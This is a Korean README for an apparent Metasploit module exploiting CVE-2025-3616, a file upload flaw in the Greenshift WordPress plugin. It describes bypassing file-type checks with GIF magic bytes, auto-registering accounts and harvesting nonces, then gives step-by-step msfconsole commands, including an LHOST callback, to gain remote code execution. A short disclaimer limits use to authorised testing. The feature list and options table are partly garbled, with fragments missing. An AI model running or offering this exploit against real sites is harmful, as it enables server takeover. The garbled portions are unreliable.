
이 저장소는 Greenshift WordPress 플러그인(11.4~11.4.5 버전)의 임의 파일 업로드 취약점인 CVE-2025-3616을 악용하기 위한 Metasploit 모듈을 포함합니다.
이 익스플로잇은 인증된 사용자(Subscriber+)가 임의 파일을 업로드하여 원격 코드 실행(RCE)으로 이어지게 합니다. GIF 매직 바이트(GIF89a;)로 MIME 유형을 스푸핑하여 플러그인의 파일 유형 검증을 우회합니다.
USERNAME/PASSWORD)을 사용한 로그인을 지원합니다.REGISTER 옵션을 포함하여 새 사용자를 자동으로 등록하고 새 세션 쿠키로 취약점을 악용합니다(대상에서 등록이 활성화된 경우 유용).wp_rest nonce를 자동으로 수집합니다.finfo_file() 검증을 우회합니다.Metasploit Framework가 설치되어 있는지 확인하세요.
wp_greenshift_file_upload.rb를 로컬 모듈 디렉토리에 복사하세요:
mkdir -p ~/.msf4/modules/exploits/unix/webapp/
cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
msfconsole을 시작하고 모듈을 다시 로드하세요:
msfconsole
msf6 > reload_all
대상에서 사용자 등록이 활성화되어 있다면 자격 증명이 필요 없습니다.
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run
이미 유효한 사용자(Subscriber 이상)가 있는 경우:
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run
이 모듈은 교육 목적 및 승인된 침투 테스트 전용입니다. 사전 상호 동의 없이 대상을 공격하는 데 이 코드를 사용하는 것은 불법입니다.
| 옵션 | 필수 | 설명 |
|---|
| RHOSTS | 예 | 대상 주소 |
| LHOST | 예 | 리슨 주소 (자신의 IP) |
| REGISTER | 아니요 | 새 계정을 자동으로 등록하려면 true로 설정 (기본값: false) |
| USERNAME | 아니요 | WordPress 사용자 이름 (REGISTER가 false인 경우 필수) |
| PASSWORD | 아니요 | WordPress 비밀번호 (REGISTER가 false인 경우 필수) |
| 아니요 | 등록용 이메일 (선택 사항, 비어 있으면 자동 생성) |